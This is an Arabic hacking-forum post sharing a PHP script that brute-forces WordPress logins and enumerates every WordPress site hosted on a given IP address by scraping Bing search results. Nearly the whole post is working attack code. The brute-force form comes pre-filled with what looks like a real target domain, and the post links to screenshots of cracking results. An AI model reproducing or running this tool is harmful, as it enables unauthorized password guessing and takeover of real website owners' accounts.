| هيب هوب هاك | 10-18-2013 03:45 AM |
Get wordpress / brute wordpress
السسلام عليكم ورحمة الله وبركاته ..
سكربت تخمين الووردبريسس .. معا خاصية استخراج جميع مواقع الورردبريسس من الاي بي http://im35.gulfup.com/G0Dz4.png
نتائج التخمين http://im38.gulfup.com/Yo95E.png
نتائج استخراج مواقع الووردبريسس من السيرفر .. http://im32.gulfup.com/mAwJ3.png كود PHP:
<head>
<meta name="description" content=" Get stie wordpress">
<title>Get stie wordpress</title>
<meta name="keywords" content=" Get stie wordpress">
</head>
<html><center>
<center><center>
<font color='red' fance='Tahoma' size='6'> <b>| Get wordpress / brute wordpress | </b></font></center>
</html><br>
<head>
<meta name="keywords" content="DsHooRi wordpress">
<meta name="description" content="DsHooRi wordpress">
<title>DsHooRi wordpress </title>
</head>
<body bgcolor="#000000">
<style>
input,textarea{
border:1px solid #8B2323;
background:#000000;
color:#FFFFFF;
}
input:hover,textarea:hover{
border:1px solid #FF40;
}
</style>
<form method='post' >
</form>
<form method='POST'>
<center>
<br> <br>
<input type="text" name="target" value="lightscamerajackson.com">
<input type="text" name="username" pholder="username" ><br>
<textarea cols="35" rows="15" name="passwords"></textarea><br>
<input type="submit" value="Start Bruting">
</center>
</form>
<?
/* CoD3d : DsH00Ri
* mail : DsHooRi@Hotmail.com
* Is-sec.com
*
*/
@set_time_limit(0);
$target = $_POST['target'];
$username = $_POST['username'];
$pass = explode("\r\n" , $_POST['passwords']);
function dshoori($target,$username,$password)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, "http://".$target."/wp-login.php");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"log={$username}&pwd={$password}&wp-submit=Log+In&redirect_to=./wp-admin/&test******=1");
curl_setopt($ch,CURLOPT_******JAR,"******.txt");
curl_setopt($ch,CURLOPT_******FILE,"******.txt");
$result = curl_exec($ch);
// if(eregi("upload.php" , $result))
// {
// echo "<center><font face='Tahoma'>[+] Cracked [ Username : <font color='red'><b>{$username}</b></font> & Password : <font color='red'><b>{$password}</b></font> ]</font></center>";
// }
return $result;
}
foreach($pass as $password)
{
$b0x = dshoori($target,$username,$password);
if(preg_match('#<div class="wp-menu-arrow"><div></div>#', $b0x))
{
echo "<center><font face='Tahoma'>[+] Cracked [ Username : <font color='red'><b>{$username}</b></font> & Password : <font color='red'><b>{$password}</b></font> ]</font></center>";
break;
}
}
set_time_limit(0);
function checke($url){
$login = $url;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$login);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1');
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function scan($ip)
{
$dork = "/wordpress";
$num = 1;
for($i=1;$i<=10;$i++)
{
$text = file_get_contents("http://www.bing.com/search?q=ip%3a{$ip}+{$dork}&go=&qs=ds&filt=all&first={$num}");
$num = $num + 10;
preg_match_all('#(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)#siU',$text,$m);
foreach($m[2] as $s)
{
$array[] = check($s);
$dd = array_unique($array);
}
}
return $dd;
}
function check($url)
{
$url = explode("/wordpress",$url);
$url = str_replace("www.","",$url);
$url = str_replace("http://","http://www.",$url);
return $url[0]."/";
}
if($_POST['ip'])
{
foreach(scan($_POST['ip']) as $url)
{
$dork = "search?q=wordpress&go=&qs=ds&form=QBRE";
$text = checke($url.$dork);
if(eregi('{"result":null,"error":"No function call specified!"}',$text) or eregi('{"result":null,"error":"Cannot call function . Function not registered!"}',$text))
{
echo "<a href='{$url}{$dork}'><font color=#00FF00><b>{$url}</b></font></a><br />";
flush();
}else{
echo "<a href='{$url}'><font color=white><b>{$url}</b></font></a><br />";
flush();
}
}
}else{
echo "<font color=black><b>please enter ip address :</b></font></a><br /><form action='?' method='POST'><input name='ip' type='text' ><br><input type='submit' value='check'></form>";
}
?>
<head>
<meta name="description" content=" brute wordprss">
<title>brute wordpress</title>
<meta name="keywords" content=" brute wordpress">
</head>
<html><center>
<center><center>
<font color='red' fance='Tahoma' size='4'> <b>| Coded ~ DsHooRi | </b></font></center>
<font color='red' fance='Tahoma' size='4'> <b>| skype ~ DsHooRi | </b></font></center>
<font color='red' fance='Tahoma' size='4'> <b>| maiL : DsHooRi@Hotmail.com | </b></font></center>
<font color='red' fance='Tahoma' size='4'> <b>| G/2 : xsecurity | Is-sec | </b></font></center>
</html><br>
دمتم بود |
